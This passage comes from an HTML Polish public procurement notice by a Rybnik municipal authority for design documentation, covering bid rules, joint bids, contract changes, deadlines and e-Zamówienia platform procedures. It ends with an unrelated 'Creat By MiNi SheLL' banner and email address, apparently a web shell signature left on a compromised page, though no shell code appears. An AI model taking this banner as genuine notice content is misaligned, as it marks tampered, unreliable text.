wykluczeniu stanowi Załącznik nr 2 do SWZ.<br/>3. Oświadczenie, o którym mowa w pkt 2 składają odrębnie:<br/>Wykonawca/każdy spośród Wykonawców wspólnie ubiegających się o udzielenie zamówienia. W takim przypadku<br/>oświadczenie potwierdza brak podstaw wykluczenia Wykonawcy.<br/>4. W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania - odpis lub<br/>informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego<br/>właściwego rejestru. Wykonawca nie jest zobowiązany do złożenia tych dokumentów, jeżeli Zamawiający może je uzyskać<br/>za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych<br/>dokumentów.<br/>5. Pełnomocnictwo złożone w sytuacji:<br/>1) Wykonawców wspólnie ubiegających się o udzielenie zamówienia – pełnomocnictwo do reprezentowania wszystkich<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Pełnomocnik może być ustanowiony do reprezentowania<br/>Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy;<br/>2) podpisania oferty względnie innych dokumentów składanych wraz z ofertą przez osobę, dla której prawo do ich<br/>podpisania nie wynika wprost z dokumentu stwierdzającego status prawny Wykonawcy (np. wypisu z Krajowego rejestru<br/>sądowego) – pełnomocnictwo do podpisania oferty. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego. W takim przypadku Wykonawcy<br/>występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.<br/>2. Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy, o niepodleganiu wykluczeniu z postępowania o udzielenie<br/>zamówienia publicznego. Wzór oświadczenia o niepodleganiu wykluczeniu stanowi załącznik nr 2 do SWZ. Oświadczenie,<br/>składają odrębnie każdy spośród Wykonawców wspólnie ubiegających się o udzielenie zamówienia. W takim przypadku<br/>oświadczenie potwierdza brak podstaw wykluczenia Wykonawcy.<br/>3. Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany umowy w przypadkach, o których mowa w art. 455 ustawy Prawo zamówień<br/>publicznych oraz w przypadkach opisanych w projektowanych postanowieniach umownych stanowiących załącznik do<br/>Specyfikacji Warunków Zamówienia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-04 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-ebe54bb6-4565-4a0b-b0f2-b9319eaa9c60</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-04 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-07-03</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Z postępowania o udzielenie zamówienia Zamawiający wykluczy wykonawców, w stosunku do których zachodzi<br/>którakolwiek z okoliczności wskazanych w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w<br/>zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z<br/>2022 r. poz. 835).<br/>Dotyczy sekcji III 3.6.)<br/>11. Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem<br/>formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem<br/>„Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i<br/>udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości<br/>(przycisk „dodaj załącznik”). W przypadku załączników, które są zgodnie z ustawą Pzp lub Rozporządzeniem Prezesa Rady<br/>Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. poz. 2452) opatrzone kwalifikowanym podpisem elektronicznym, podpisem<br/>zaufanym lub podpisem osobistym mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego<br/>się o udzielenie zamówienia, podpisem zewnętrznym lub wewnętrznym. W zależności od rodzaju podpisu i jego typu<br/>(zewnętrzny, wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane dokumenty wraz z wygenerowanym<br/>plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).<br/>12. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta<br/>„Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy<br/>do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie<br/>tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>13. Wszystkie wysłane i odebrane w postępowaniu przez Wykonawcę wiadomości widoczne są po zalogowaniu w<br/>podglądzie postępowania w zakładce „Komunikacja”.<br/>14. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta<br/>dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/>15. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia<br/>oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>16. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy<br/>mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (22) 458 77 99 lub drogą elektroniczną<br/>poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>17. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za<br/>pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres<br/>e-mail: dzp@zgm.rybnik.pl (nie dotyczy składania ofert).<br/>Dotyczy sekcji IV 4.2.10.) - okres realizacji zamówienia<br/>Termin wykonania dokumentacji projektowej: 180 dni od dnia zawarcia umowy w zakresie całości przedmiotu zamówienia,<br/>w tym:<br/>1) przedstawienie wstępnej koncepcji w terminie do 7 dni od dnia zawarcia umowy,<br/>2) przedstawienie sporządzonej koncepcji w terminie zadeklarowanym przez Wykonawcę w ofercie (maksymalnie do 28 dni<br/>od dnia zawarcia umowy)

Creat By MiNi SheLL
Email: jattceo@gmail.com